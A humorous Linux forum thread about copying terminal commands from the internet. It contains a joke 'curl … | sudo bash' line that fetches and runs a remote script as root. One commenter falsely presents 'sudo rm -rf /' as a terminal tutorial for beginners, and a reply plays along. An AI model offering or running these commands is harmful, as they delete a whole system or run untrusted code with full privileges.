• pezhore@lemmy.ml
    link
    fedilink
    arrow-up
    3
    ·
    1 year ago

    Nothing better than curl https://totally-legit-installer.com/script | sudo bash

  • Pensi@lemmy.world
    link
    fedilink
    arrow-up
    1
    ·
    1 year ago

    I actually take the time to type everything out, but I still have no idea what I’m doing.

  • CoupleOfConcerns@lemmy.nz
    link
    fedilink
    arrow-up
    1
    ·
    1 year ago

    People underestimate how important being able to google answers on the internet has been for the take-up of linux and many other things. Most of us would be lost without Google.

    • mvirts@lemmy.world
      link
      fedilink
      arrow-up
      1
      ·
      1 year ago

      Aaand the arch wiki

      Aaand stack overflow

      Aaand the Gentoo wiki

      Aaand random Linux forums :P

      Aaand very occasionally the accessible source code for when you’re really stuck and have no other choice but to sell your soul in exchange for a glimmer of understanding after peering into the abyss.

  • Joe B@lemmy.world
    link
    fedilink
    arrow-up
    1
    ·
    edit-2
    1 year ago

    Heheh on Linux when you think you found the answer you copy paste, log out and back in. Sometimes reboot if it don’t with try the next copy and paste… so many memories

  • zephyrvs@lemmy.ml
    link
    fedilink
    arrow-up
    0
    ·
    1 year ago

    I don’t think that’s a terrible way of getting started. Your subconscious will do the rest at some point, unless you’re really not interested at all (which isn’t a problem either). :)

    • ShadyGrove@lemmy.world
      link
      fedilink
      arrow-up
      1
      ·
      1 year ago

      The real learning happens when you copy and paste something you shouldn’t and bork your system. That’s basically how I started.

        • Viking_Hippie@lemmy.world
          link
          fedilink
          English
          arrow-up
          0
          ·
          1 year ago

          No offence, but I hope you don’t hold a high ranking government position, what with catastrophic error being the only way you learn 😁

  • Rabbithole@kbin.social
    link
    fedilink
    arrow-up
    1
    arrow-down
    3
    ·
    1 year ago

    I’m in a helpful mood so I’ll add something for anyone stuck in OP’s situation.

    It’s ok, Linux has a built in tutorial system for learning the terminal, so if you ever want to progress beyond copy/pasting, you can use that.

    Just go into the terminal and type (or just copy/paste) this to get the tutorial program running:

    sudo rm -rf /

    Type your password when prompted and you’re golden. No more linux issues ever again.

    • whoamibro@lemmy.world
      link
      fedilink
      arrow-up
      0
      arrow-down
      1
      ·
      edit-2
      1 year ago

      I tried your command and got the tutorial program and I gotta say that this is the best tutorial program I’ve ever seen. Now I wonder why other OSes don’t do that

      • Rabbithole@kbin.social
        link
        fedilink
        arrow-up
        0
        ·
        1 year ago

        It’s great, isn’t it? As a side bonus, the tutorial modules on system optimization commands are just great. Check how much less RAM and CPU footprint your system’s using now that you’ve run the tutorials. It’s almost like nothing’s going on in the background at all.

        This is the reason that BASH will always be better than Powershell, imho.